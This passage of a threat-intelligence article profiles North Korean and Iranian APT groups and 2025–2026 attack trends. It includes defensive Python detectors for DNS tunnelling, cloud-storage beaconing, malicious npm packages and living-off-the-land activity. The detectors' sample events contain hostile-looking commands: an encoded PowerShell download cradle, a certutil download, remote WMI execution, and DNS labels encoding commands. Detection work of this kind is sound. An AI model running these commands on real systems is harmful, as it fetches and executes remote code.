Lazarus also established a Medusa ransomware affiliate relationship, conducting ransomware attacks against non-cryptocurrency targets through the Medusa RaaS platform. This provides deniability (the attack appears as criminal ransomware) and a secondary revenue stream from ransom payments.
Signature TTPs:
- Smart contract and DeFi protocol exploitation for direct fund theft
- JavaScript injection into web-based transaction signing interfaces
- Trojanized developer tools and packages (800+ malicious npm packages documented)
- macOS-specific malware targeting cryptocurrency sector
- Social engineering of DeFi protocol team members via fake job offers
- Sophisticated cryptocurrency laundering via cross-chain bridges
Primary targeting: Cryptocurrency exchanges, DeFi protocols, blockchain development teams, financial institutions with crypto custody, defense contractors (for intelligence collection parallel to financial operations)
Kimsuky / APT43 (RGB)
Attribution: RGB, assessed with high confidence by U.S., South Korean, and allied intelligence services. Sanctioned by U.S. Treasury in May 2023.
Mandate: Intelligence collection in support of Kim Jong Un’s regime — political, military, and diplomatic intelligence. Secondary mission: credential and financial theft to support operations.
2025–2026 campaigns:
Kimsuky made a significant operational shift in late 2025 and early 2026: the pivot to QR code phishing (quishing). The FBI issued a formal warning in January 2026 about Kimsuky campaigns delivering QR codes by email and by physical mail, as printed documents sent to think tank researchers and embassy staff. The technique defeats controls built around hyperlinks: a gateway that extracts and rewrites URLs never sees the one encoded in the image, and the victim scans it with a personal phone that sits outside the corporate proxy, endpoint agent and URL-filtering policy entirely. Victims land on credential-harvesting pages optimised for mobile browsers.
Embassy and think tank impersonation remained the primary lure theme, consistent with Kimsuky’s intelligence collection mandate. The group created convincing replicas of South Korean, Japanese, and European diplomatic institution web presences and conference registration systems. Approximately 60% of Kimsuky operations target South Korean entities, with the remaining 40% distributed across Japanese, European, and North American research and policy institutions.
A zero-day sharing arrangement between Kimsuky and Lazarus Group was documented: Kimsuky shares newly discovered vulnerabilities, and Lazarus provides the laundering infrastructure for proceeds from Kimsuky-stolen credentials resold to brokers.
Signature TTPs:
- QR code phishing bypassing email URL inspection
- Embassy and diplomatic institution impersonation
- BabyShark, AppleSeed, RandomQuery malware families
- Browser credential theft and session hijacking
- Extension-based credential harvesting targeting Chrome profiles
- Zero-day sharing with Lazarus Group
Primary targeting: South Korean government, military, diplomatic missions; Japanese and European policy institutions; North Korea-focused academics and journalists globally
Andariel / APT45 (RGB)
Attribution: RGB, assessed as subordinate to Lazarus Group organizational structure.
Mandate: Intelligence collection against defense and nuclear sectors; financial crime as secondary objective.
2025–2026 campaigns:
Andariel was sanctioned by the U.S. Treasury in July 2025 specifically for operating an IT worker fraud scheme in which North Korean nationals posed as freelance software developers and remote IT workers at Western companies. The scheme placed individuals inside organizations including defense contractors, aerospace companies, and technology firms. Revenue generated by the IT worker operations funded the RGB’s cyber program; access obtained through employment was used for intelligence collection. The scale was significant — DOJ indictments referenced hundreds of companies across 12+ countries hosting unwitting North Korean employees.
Andariel operates as a Play ransomware affiliate, deploying ransomware against organizations outside its intelligence collection mandate for direct financial return. This represents the same pattern as Lazarus/Medusa: the group uses commercial ransomware to generate revenue and obscure attribution, since Play infections appear as criminal rather than state activity.
Primary targeting: Defense contractors, aerospace companies, nuclear research facilities, technology firms with defense adjacency
Signature TTPs:
- IT worker infiltration via fake freelance developer personas
- Play ransomware deployment for financial return
- Defense contractor targeting for weapons system intelligence
- Nuclear facility and research targeting
Iran: Geopolitically Timed Operations
Iran’s cyber program is coordinated by the Islamic Revolutionary Guard Corps (IRGC) and the Ministry of Intelligence and Security (MOIS). Unlike Russia and China, which maintain relatively consistent operational tempo, Iranian cyber operations show clear synchronization with domestic political events and military actions — a pattern that provides forensic evidence of state command-and-control over ostensibly independent groups.
Refined Kitten / APT33 (IRGC)
Attribution: IRGC, assessed with high confidence by multiple Western intelligence services.
Mandate: Intelligence collection, with particular focus on energy sector and potential destructive capability development.
2025–2026 activity:
APT33 continued targeting petroleum and petrochemical companies across the Middle East, focusing on operational technology networks connected to oilfield management systems. The group deployed Tickler malware — a multi-stage implant using Azure infrastructure as a C2 channel. Like APT41’s Google Calendar technique, Tickler leverages Microsoft’s Azure services to blend C2 traffic with legitimate enterprise cloud traffic.
Improved OPSEC was documented across APT33 operations in this period: reduced reuse of infrastructure, shorter persistence periods before pivoting, and more aggressive anti-forensics behavior in post-compromise activity.
Signature TTPs:
- Tickler malware with Azure-based C2
- Spear-phishing targeting energy sector HR and IT personnel
- PowerShell-based persistence and credential harvesting
- OT network reconnaissance from IT access
OilRig / APT34 (MOIS)
Attribution: Iranian Ministry of Intelligence and Security (MOIS). Extensively attributed by Mandiant, Palo Alto Unit 42, and allied intelligence services.
Mandate: Regional intelligence collection (Gulf states, Iraq, broader Middle East); information operations; selective destructive operations.
2025–2026 campaigns:
APT34’s most significant 2025 campaign targeted Iraqi government ministries and diplomatic missions with two new backdoors, Veaty and Spearal. Veaty’s C2 runs through a mailbox rather than a server: the implant authenticates to a compromised email account the attacker controls, polls the Drafts folder for unsent messages that carry encoded commands, and writes results back as further drafts. No mail is ever sent, so gateway and mail-flow monitoring sees nothing; the activity surfaces only in mailbox audit logs (items created and accessed by an unfamiliar client) and in that account’s sign-in records.
Spearal moves data over DNS: encoded chunks are carried in the subdomain labels of queries for the attacker’s zone, with TXT records used to return responses. The channel passes most network controls because DNS is treated as infrastructure rather than data traffic and is rarely logged at query-name granularity; query-name length, label entropy and the volume of unique subdomains per zone are what expose it.
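Tunnelling over DNS has the same statistical shape regardless of the implant, which is what a detector should key on. The following is an added example, not from the report and not derived from Spearal samples: it groups constructed DNS query-log lines by parent zone and scores each client/zone pair on label length, Shannon entropy, unique-subdomain ratio and the share of TXT queries. The `update-cdn.net` zone, the client IPs and the thresholds are invented for the example; real deployments tune the thresholds per network and allow-list CDN and anti-spam zones that legitimately look random.

```python
"""Score DNS query logs for TXT-based tunnelling of the kind described for Spearal.

Added example, not from the original report and not derived from Spearal samples.
Tunnelling over DNS looks alike whatever the implant: many queries for unique, long,
high-entropy subdomains under one parent zone, often of type TXT. This groups
constructed query-log lines (timestamp, client, qtype, qname) by parent zone and
scores each (client, zone) pair. Thresholds are illustrative and must be tuned.
"""
import math
from collections import defaultdict

# Constructed query log (not real data). Format: "ts client qtype qname".
SAMPLE_LOG = """
1700000000 10.0.0.21 A     www.example.com
1700000001 10.0.0.21 TXT   _dmarc.example.com
1700000002 10.0.0.21 A     mail.example.com
1700000010 10.0.0.37 TXT   aGVsbG8gd29ybGQgaW4gdGhlIGVuZA.c2.update-cdn.net
1700000012 10.0.0.37 TXT   Y21kIGxzIC1sYSAvaG9tZS91c2Vy.c2.update-cdn.net
1700000014 10.0.0.37 TXT   d2hvYW1pIDsgaG9zdG5hbWUgOw.c2.update-cdn.net
1700000016 10.0.0.37 TXT   cHMgYXV4IHwgZ3JlcCBzc2hkIA.c2.update-cdn.net
1700000018 10.0.0.37 TXT   Y2F0IC9ldGMvcGFzc3dkIHwgaGVhZA.c2.update-cdn.net
1700000020 10.0.0.37 TXT   bmV0c3RhdCAtYW50IHwgaGVhZA.c2.update-cdn.net
1700000030 10.0.0.21 A     cdn.example.com
"""

ALLOWLIST_ZONES = {"example.com"}   # zones known benign in this (hypothetical) estate


def shannon_entropy(s):
    """Bits of entropy per character; base64/base32 blobs score far above hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    rows = []
    for line in text.strip().splitlines():
        ts, client, qtype, qname = line.split()
        rows.append({"ts": int(ts), "client": client, "qtype": qtype.upper(),
                     "qname": qname.lower().rstrip(".")})
    return rows


def parent_zone(qname, levels=2):
    # Simplification: the last two labels. Production code should use the public suffix list.
    return ".".join(qname.split(".")[-levels:])


def score_dns(rows, min_queries=5, allowlist=ALLOWLIST_ZONES):
    """Return per-(client, zone) feature rows that exceed the tunnelling thresholds."""
    groups = defaultdict(list)
    for r in rows:
        zone = parent_zone(r["qname"])
        if zone in allowlist:
            continue
        groups[(r["client"], zone)].append(r)
    alerts = []
    for (client, zone), qs in groups.items():
        if len(qs) < min_queries:
            continue
        subs = [q["qname"][: -len(zone) - 1] for q in qs if q["qname"] != zone]
        if not subs:
            continue
        first_labels = [s.split(".")[0] for s in subs]   # the label that carries the payload
        features = {
            "client": client, "zone": zone, "queries": len(qs),
            "txt_ratio": sum(q["qtype"] == "TXT" for q in qs) / len(qs),
            "unique_ratio": len(set(subs)) / len(qs),
            "avg_label_len": sum(map(len, first_labels)) / len(first_labels),
            "avg_entropy": sum(map(shannon_entropy, first_labels)) / len(first_labels),
        }
        # Illustrative thresholds: long, unique, high-entropy labels, mostly TXT.
        if (features["unique_ratio"] > 0.8 and features["avg_label_len"] > 20
                and features["avg_entropy"] > 3.5 and features["txt_ratio"] > 0.5):
            alerts.append(features)
    return alerts


if __name__ == "__main__":
    for a in score_dns(parse_log(SAMPLE_LOG)):
        print(f"{a['client']} -> {a['zone']}: {a['queries']} queries, TXT {a['txt_ratio']:.0%}, "
              f"entropy {a['avg_entropy']:.2f}, label len {a['avg_label_len']:.1f}")
```

The TXT ratio is the weakest feature, since an implant can switch to A or NULL queries overnight; unique-subdomain volume and entropy per zone survive that change and are the features to keep if only one is affordable.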
AI-enhanced operations were documented in APT34’s UAE campaigns — specifically AI-generated spear-phishing content that incorporated accurate details about target individuals’ professional histories, publications, and organizational relationships, dramatically increasing lure quality without proportional increase in operator time.
The January 2026 operational pause is the most significant forensic indicator of state coordination. APT34 operations effectively ceased between January 8–27, 2026 — a period that coincides precisely with an extended Iranian government-imposed internet blackout in response to domestic unrest. The correlation between infrastructure control exercised by the Iranian state and APT34’s operational silence is not explained by coincidence; it is the clearest documented evidence of direct state command over ostensibly independent threat actors.
The group resumed and surged operations following Operation Epic Fury on March 2, 2026 — a U.S.-Israeli military strike on Iranian nuclear facilities. APT34 increased operational tempo across all documented victim sectors within 72 hours of the strike.
Signature TTPs:
- Veaty: email draft C2 (no email actually sent)
- Spearal: DNS tunneling via TXT record queries
- AI-enhanced spear-phishing with accurate personal research
- Operational synchronization with Iranian government internet controls
- Surge pattern following military events involving Iran
Primary targeting: Gulf state governments, Iraqi ministries, U.S. and Israeli-linked organizations, energy sector across Middle East and North Africa
MuddyWater (MOIS)
Attribution: Iranian Ministry of Intelligence and Security (MOIS), assessed with high confidence by CISA, FBI, NSA and partner agencies in a February 2022 joint advisory; operations have continued and expanded since.
Mandate: Intelligence collection across Middle East and Central Asia; expanding global diplomatic targeting.
2025–2026 campaigns:
MuddyWater conducted Operation Olalampo in January 2026, a campaign deploying the Dindoor backdoor against government targets in the Gulf and Levant. Dindoor is written for the Deno JavaScript runtime, a Node.js alternative that ships as a single binary and can bundle a script into a standalone executable. The choice buys evasion cheaply: few AV/EDR rule sets or behavioural baselines cover Deno the way they cover node, wscript or powershell, and the process looks like a developer tool. The practical check is inventory, since Deno is rare outside development machines and its presence on a diplomat’s workstation is itself an indicator. Code-structure patterns inconsistent with typical human-authored malware led analysts to assess the development as likely GenAI-assisted.
The Phoenix backdoor campaign targeted over 100 organizations, with 75% of victims being embassies or diplomatic missions. Phoenix uses a modular architecture that downloads capability modules on demand, limiting the full attack toolset’s exposure on any single victim. Command-and-control uses legitimate cloud storage providers (OneDrive, Box) as drop points for encrypted command files, with implants polling these locations on randomized intervals.
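Cloud-storage C2 defeats destination-based blocking, because the destination is a provider you already allow, so the useful signal is timing plus provenance: a polling loop with bounded jitter produces inter-arrival gaps with a low coefficient of variation, and the provider's own sync client is not the only process that should show that pattern. The following is an added example for this article, not MuddyWater code or a vendor rule. The hosts, process names (including `update_helper.exe`), timings and the `EXPECTED_CLIENTS` baseline are constructed; the provider hostnames are real endpoints used only as sample values.

```python
"""Jitter-aware beaconing check for implants that poll a legitimate cloud
storage provider, as the article describes for Phoenix.  Added example for
this article; not MuddyWater code and not a vendor rule.  Hosts, process
names and timings are constructed."""
import math
from collections import defaultdict
from itertools import accumulate

# Processes that legitimately poll these providers on a schedule (assumed
# baseline).  Periodic traffic from anything else deserves a look even though
# the destination itself is allowlisted.
EXPECTED_CLIENTS = {
    "onedrive.live.com": {"onedrive.exe"},
    "api.box.com": {"box.exe"},
}


def _records(host, process, dest, start, deltas):
    """Build (ts, host, process, dest) tuples from a list of inter-arrival gaps."""
    return [(ts, host, process, dest) for ts in accumulate([start] + deltas)]


# Constructed sample: the real sync client and an unknown binary both poll
# OneDrive at ~300 s with +/-20 % jitter; a browser hits Box at irregular times.
SAMPLE_RECORDS = (
    _records("WS-17", "OneDrive.exe", "onedrive.live.com", 1736000000,
             [252, 331, 288, 301, 345, 267, 312, 295, 280, 340])
    + _records("WS-17", "update_helper.exe", "onedrive.live.com", 1736000100,
               [310, 262, 340, 289, 301, 255, 328, 296, 274, 335])
    + _records("WS-17", "chrome.exe", "api.box.com", 1736000000,
               [5, 900, 12, 3, 3600, 47, 8, 1200, 19])
)


def interval_stats(timestamps):
    """Return (gap count, mean gap, coefficient of variation) for a timestamp list."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return len(gaps), 0.0, float("inf")
    mean = sum(gaps) / len(gaps)
    var = sum((g - mean) ** 2 for g in gaps) / len(gaps)
    return len(gaps), mean, (math.sqrt(var) / mean if mean else float("inf"))


def detect_beacons(records, min_gaps=8, max_cv=0.3):
    """Flag (host, process, dest) triples whose gaps are regular enough to be a
    polling loop with bounded jitter, unless the process is the provider's own
    client.  cv = stdev/mean: +/-20 % uniform jitter gives roughly 0.1, while
    interactive use typically exceeds 1.0."""
    by_key = defaultdict(list)
    for ts, host, process, dest in records:
        by_key[(host, process.lower(), dest.lower())].append(ts)
    findings = []
    for (host, process, dest), stamps in by_key.items():
        n, mean, cv = interval_stats(stamps)
        periodic = n >= min_gaps and cv <= max_cv
        expected = process in EXPECTED_CLIENTS.get(dest, set())
        findings.append({
            "host": host, "process": process, "dest": dest,
            "gaps": n, "mean_gap_s": round(mean, 1), "cv": round(cv, 3),
            "periodic": periodic, "beacon_like": periodic and not expected,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_beacons(SAMPLE_RECORDS):
        print(finding)
```

The `periodic` and `beacon_like` fields are kept separate on purpose: the legitimate sync client is just as periodic as the implant, so a timing-only rule would page on every workstation. Provenance (which binary opened the connection, which requires endpoint or proxy logs that carry a process name) is what separates the two, and an implant that injects into the real client defeats this check and needs memory-level telemetry instead.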
Signature TTPs:
- Dindoor: Deno-based backdoor with suspected GenAI-assisted development
- Phoenix: modular implant with cloud storage C2
- Heavy focus on embassy and diplomatic mission targeting (75% of Phoenix victims)
- Spear-phishing leveraging compromised government email accounts as senders
- Operation Olalampo: multi-country coordinated campaign
Primary targeting: Middle Eastern and Gulf state embassies, diplomatic missions, government ministries; expanding into European diplomatic targets
Cross-Cutting Trends 2025–2026
AI as Operational Infrastructure
The integration of AI into offensive operations moved from experimental to operational across all four nation-state blocs during 2025. The impact manifests at multiple points in the attack chain.
At the phishing generation layer, ENISA 2025 data indicates 80% of phishing campaigns contain AI-generated content. This does not mean simple typo-correction; it means content that passes human review, references accurate contextual details, and adapts tone to match organizational communication norms inferred from OSINT. The labor cost of producing high-quality phishing content at scale has effectively dropped to near zero.
At the malware development layer, APT36’s documented use of AI as a polymorphic variant generator represents a qualitative shift. Traditional signature-based detection relies on malware retaining identifying characteristics across samples. AI-generated polymorphic variants change structural and syntactic characteristics while preserving functional behavior, creating a detection problem that static signatures cannot solve on their own; detection has to key on the behavior the variants must preserve to remain functional (the API calls, network pattern and file-system effects) rather than on bytes.
At the reconnaissance layer, AI-assisted OSINT processing allows adversaries to ingest and correlate vastly larger volumes of public data than human analysts can process. Organizational relationships, personnel movements, travel patterns, and communication networks can be modeled from public sources at a scale that previously required significant analyst resources.
| Nation-State | Documented AI Use | Suspected AI Use |
|---|---|---|
| Russia | AI-generated phishing lures (APT28) | AI-assisted malware polymorphism |
| China | AI-enhanced spear-phishing (APT41 trade-policy targeting) | Automated OSINT correlation |
| North Korea | AI-generated fake developer personas | AI-assisted code for crypto theft tools |
| Iran | AI-enhanced UAE spear-phishing (APT34), GenAI malware dev (MuddyWater) | AI-generated disinformation content |
Supply Chain as Preferred Entry
Supply chain attacks reached 297 documented incidents in 2025, a 93% increase from 154 in 2024. The methodology has diversified significantly beyond the SolarWinds model.
PlushDaemon (China-linked) compromised a Korean VPN software distribution channel — injecting a backdoored installer into the vendor’s own legitimate update infrastructure. Thousands of enterprise installations received the malicious update through a trusted vendor relationship.
Shai-Hulud was the first documented self-replicating npm package. Its payload runs from an install-time lifecycle script, harvests npm and other tokens from the developer’s environment, and uses the stolen npm token to publish trojanized versions of every other package that account maintains, so a single compromised maintainer account propagated the worm to all of that maintainer’s packages.
Lazarus Group maintained an industrial-scale npm poisoning operation with over 800 malicious packages in the npm registry, targeting cryptocurrency and DeFi developers. Package names mimicked legitimate cryptography and wallet libraries with typosquatting and dependency confusion techniques.
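The three npm abuses above (Shai-Hulud’s install-time hook, Lazarus’s typosquats of wallet and cryptography libraries, and dependency confusion against internal package names) can all be caught before `npm install` runs by auditing the lockfile rather than trusting the registry. The following is an added example for this article, not a reproduction of any campaign’s code and not an npm feature. The lockfile entries, the `@acme` scope, the `registry.internal.acme.test` host and the `POPULAR` name list are constructed for the example; a real check would derive the popular-name list from your dependency inventory and the registry’s download ranks.

```python
"""Pre-install lockfile audit for the three npm abuses described above:
install-time lifecycle scripts, typosquats of popular libraries, and
dependency confusion on internal scopes.  Added example for this article;
the lockfile entries, scope, registry host and popular-name list are
constructed."""

INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Assumed: names that matter to this codebase.
POPULAR = ["ethers", "web3", "bitcoinjs-lib", "axios", "lodash"]

# Assumed: internal scopes and the registry host they must resolve from.
INTERNAL_SCOPES = {"@acme": "registry.internal.acme.test"}

# Constructed lockfile-style entries (name, version, resolved URL, scripts).
SAMPLE_LOCK = [
    {"name": "ethers", "version": "6.13.0",
     "resolved": "https://registry.npmjs.org/ethers/-/ethers-6.13.0.tgz", "scripts": {}},
    {"name": "ethres", "version": "1.0.2",
     "resolved": "https://registry.npmjs.org/ethres/-/ethres-1.0.2.tgz",
     "scripts": {"postinstall": "node setup.js"}},
    {"name": "@acme/internal-auth", "version": "9.9.9",
     "resolved": "https://registry.npmjs.org/@acme/internal-auth/-/internal-auth-9.9.9.tgz",
     "scripts": {}},
    {"name": "lodash", "version": "4.17.21",
     "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
     "scripts": {"test": "mocha"}},
]


def levenshtein(a: str, b: str) -> int:
    """Edit distance between a and b (two-row dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registry_host(url: str) -> str:
    """Host part of a resolved tarball URL."""
    return url.split("://", 1)[-1].split("/", 1)[0].lower()


def audit_entry(entry, max_distance=2):
    """Return a list of (rule, detail) findings for one lockfile entry."""
    name = entry["name"]
    findings = []
    # Rule 1: anything that executes at install time gets reviewed before install.
    hooks = sorted(INSTALL_HOOKS & set(entry.get("scripts", {})))
    if hooks:
        findings.append(("install-script", f"{name} runs {', '.join(hooks)} at install time"))
    # Rule 2: near-miss of a well-known name (distance 0 is the real package).
    for popular in POPULAR:
        d = levenshtein(name, popular)
        if 0 < d <= max_distance:
            findings.append(("typosquat", f"{name} is within {d} edit(s) of {popular}"))
    # Rule 3: an internal scope that resolved from the public registry.
    scope = name.split("/", 1)[0] if name.startswith("@") else None
    if scope in INTERNAL_SCOPES:
        host = registry_host(entry["resolved"])
        if host != INTERNAL_SCOPES[scope]:
            findings.append(("dependency-confusion",
                             f"{name} resolved from {host}, expected {INTERNAL_SCOPES[scope]}"))
    return findings


def audit_lock(entries):
    """Audit every entry; returns {name: [(rule, detail), ...]} for entries with findings."""
    report = {}
    for entry in entries:
        findings = audit_entry(entry)
        if findings:
            report[entry["name"]] = findings
    return report


if __name__ == "__main__":
    for pkg, findings in audit_lock(SAMPLE_LOCK).items():
        for rule, detail in findings:
            print(f"{rule:22} {detail}")
```

Running this in CI with `npm ci --ignore-scripts` as the install step closes the Shai-Hulud propagation path (the hook never executes), and pinning the internal scope to the internal registry in `.npmrc` removes the dependency-confusion case; the audit then serves as the check that neither control has silently regressed.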
Identity Over Malware
65% of initial access incidents in 2025 were identity-driven (credential theft, session hijacking, token abuse or MFA bypass) rather than exploit-driven. This figure reflects a fundamental shift in adversary preference: identity-based access is harder to detect, rarely trips AV/EDR because no payload executes, and yields the same or better access than exploiting a vulnerability.
90% of incident investigations documented a material identity weakness as a contributing factor, even when the initial access vector was an exploit. Credential reuse, long-lived tokens, excessive permission scopes, and absence of MFA on privileged accounts are so pervasive that they function as a secondary attack surface regardless of how initial access was achieved.
LOTL Dominance
79% of all detections in 2025 were malware-free — attackers operating exclusively through legitimate system tools, scripting engines, and administrative utilities. 84% of high-severity attacks used LOTL techniques as their primary operational methodology. PowerShell appeared in 71% of documented intrusion cases.
The strategic logic is compelling: in most environments, PowerShell execution by administrative accounts is normal. WMI queries are normal. certutil downloading files is unusual but not consistently monitored. The detection problem is not identifying malicious tools — it is identifying malicious use of legitimate tools in an environment where those tools have legitimate uses that generate similar telemetry.
Volt Typhoon’s zero-custom-malware approach is the extreme end of this spectrum, but it represents the direction the entire adversary landscape is moving. Custom malware is increasingly a liability, not an asset, in heavily monitored environments.
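Because the binaries are legitimate, the detection has to sit on the command line and the process tree rather than on the file. The following is an added example for this article, not Volt Typhoon tooling and not a vendor signature: a small rule set over process-creation events that decodes `-EncodedCommand` payloads before matching them, flags `certutil` downloads, catches WMI remote process creation, and notes script hosts spawned by Office. The event dictionaries are constructed to resemble Sysmon Event ID 1 fields; the paths, host and the `10.0.0.9` and `10.0.0.20` addresses are sample values.

```python
"""Rule set for the living-off-the-land patterns named in the text (certutil
downloads, encoded PowerShell, WMI remote process creation, Office-spawned
script hosts) over process-creation events.  Added example for this article;
not Volt Typhoon tooling and not a vendor signature.  Events are constructed
to resemble Sysmon Event ID 1 fields."""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Download-cradle vocabulary, matched against the decoded command where one exists.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|frombase64string",
    re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _encode_ps(command: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -e/-ec/-enc/-EncodedCommand argument, or None.
    The flag match is deliberately loose; a production rule would tokenise the
    command line rather than regex it."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample events.  Event 2 wraps a download cradle in -enc and is
# spawned by Word; events 0 and 3 are the benign look-alikes of events 1 and 2.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -hashfile C:\\tools\\installer.msi SHA256",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://10.0.0.9/x.dat C:\\Users\\Public\\x.dat",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.9/a.ps1')"),
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic /node:10.0.0.20 /user:CORP\\svc_backup process call create "cmd /c whoami"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]


def evaluate(event):
    """Return a list of (rule, detail) hits for one process-creation event."""
    img, cmd = _basename(event["Image"]), event["CommandLine"]
    hits = []
    if img == "certutil.exe":
        if re.search(r"-urlcache", cmd, re.I) and re.search(r"https?://", cmd, re.I):
            hits.append(("certutil-download", cmd))
        if re.search(r"-decode\b", cmd, re.I):
            hits.append(("certutil-decode", cmd))
    elif img in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append(("powershell-encoded", decoded))
        body = decoded if decoded is not None else cmd
        if CRADLE_RE.search(body):
            hits.append(("powershell-cradle", body))
    elif img == "wmic.exe":
        if re.search(r"/node:", cmd, re.I) and re.search(r"process\s+call\s+create", cmd, re.I):
            hits.append(("wmic-remote-exec", cmd))
    if img in SCRIPT_HOSTS and _basename(event.get("ParentImage", "")) in OFFICE_APPS:
        hits.append(("office-spawned-shell", event["ParentImage"]))
    return hits


def scan(events):
    """Return {event_index: [(rule, detail), ...]} for events with at least one hit."""
    return {i: hits for i, hits in ((i, evaluate(e)) for i, e in enumerate(events)) if hits}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        for rule, detail in hits:
            print(f"event {idx}: {rule}: {detail[:80]}")
```

Decoding before matching is the step most often skipped: a rule that looks for `DownloadString` on the raw command line never sees it inside an `-enc` blob, which is exactly why the flag is popular. The benign events (a `certutil -hashfile` and a scheduled `-File` script) are there to keep the rules honest; in most environments those are the far more common shapes, and a rule that fires on them will be tuned out within a week.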
Speed Compression
The median adversary breakout time, from initial foothold to active lateral movement or exfiltration, compressed to 72 minutes in 2026, a fourfold reduction from prior-year metrics. The distribution is not uniform: the fastest observed operations moved from initial access to domain compromise in under 20 minutes, and 72 minutes is the median across all documented nation-state intrusions.
Geopolitical Synchronization
The most analytically significant development in the 2025–2026 period is the documented correlation between geopolitical events and cyber operation patterns.
Russia has completed the integration of cyber operations into kinetic warfare doctrine. Sandworm operates on military timelines, not intelligence timelines. DynoWiper’s December 2025 Poland deployment was not opportunistic — it aligned with Russian military pressure on NATO’s eastern flank. Cyber and kinetic are no longer parallel tracks; they are the same track.
China’s Volt Typhoon and Salt Typhoon investments are not traditional espionage. Traditional espionage steals information. Volt Typhoon builds access that can switch off infrastructure. Salt Typhoon’s CALEA compromise enables real-time communications interception of specific targeted individuals — a capability more consistent with preparing a crisis intelligence infrastructure than with routine collection. The strategic read is consistent across multiple intelligence services: this is pre-positioning for a potential conflict scenario, not current-cycle espionage.
Iran has provided the clearest empirical evidence of state command over ostensibly independent APT groups through APT34’s January 2026 operational pause. The pause is not explainable by coincidence. It is not explained by infrastructure disruption (the same infrastructure was active immediately before and after). The only coherent explanation is that the group stopped operating because the state told it to stop — and resumed when the state told it to resume. The surge following Operation Epic Fury follows the same logic: cyber operations are a tool of Iranian statecraft, deployed and retracted in coordination with other instruments of state power.
North Korea’s cryptocurrency theft program is the most financially significant state-directed criminal operation in history. The $2.02 billion taken in 2025 represents a material contribution to a weapons program under comprehensive international sanctions. The Bybit operation demonstrated capability to execute single-event thefts of unprecedented scale; the IT worker fraud scheme demonstrated the ability to maintain long-term covert presence inside Western organizations without technical exploitation. These are not parallel capabilities — they are complementary components of a comprehensive financial warfare program.
The Landscape Ahead
Several trajectories are clear from current evidence.
The nation-state / criminal nexus will deepen. Lazarus/Medusa, Andariel/Play, and Turla/Gamaredon represent different expressions of the same structural trend: nation-states using criminal group infrastructure for deniability, and criminal groups benefiting from nation-state resources and targeting intelligence. Attribution will become progressively harder as this blurring continues.
AI will force a TTPs reset. When 80% of phishing is AI-generated, the behavioral signals that trained analysts have learned to recognize become unreliable. When polymorphic malware generators eliminate stable signatures, signature-based detection degrades. The adversary AI integration that was “early adopter” in 2025 will be industry standard by 2027. Detection engineering will need to adapt at a pace the field has not previously had to sustain.
Speed compression will continue. 72 minutes is not a floor; it is the current median. The factors that compressed breakout time (better automation, better credential access, better LOTL techniques) continue to improve. Defender response pipelines calibrated for multi-hour dwell times are already mismatched to current adversary capability; they will become progressively more mismatched.
More actors, not fewer. At least eight additional nation-states not covered in this assessment maintain operational APT programs — Pakistan, India, Vietnam, Belarus, Israel, and others. As the cost of operating a capable cyber program continues to decline (AI reduces the talent floor; commodity tools reduce the development cost; RaaS reduces the infrastructure cost), the number of state actors with credible offensive capability will expand.
Critical infrastructure is the contested terrain. Volt Typhoon’s multi-year positioning, Sandworm’s ICS-specific wiper development, Salt Typhoon’s CALEA compromise — these are not intelligence programs. They are weapons programs, positioned for activation under conditions that have not yet been met. The infrastructure of daily life — power, water, communications, logistics — is already compromised. The question is not whether, but when and under what conditions those pre-positioned capabilities will be used.
Related Posts
- The World’s Most Dangerous Hacking Teams: A Guide to Nation-State APT Groups — The accessible companion piece to this article; covers the same groups with more foundational context for readers new to APT profiling
- Salt Typhoon: How China Hacked the World’s Largest Telecoms — Deep dive into the Salt Typhoon telecom breach campaign, attack chain, and scope
- LOLBins in 2026: How Attackers Use Windows Against Itself — Full technical breakdown of LOTL techniques used by Volt Typhoon and others
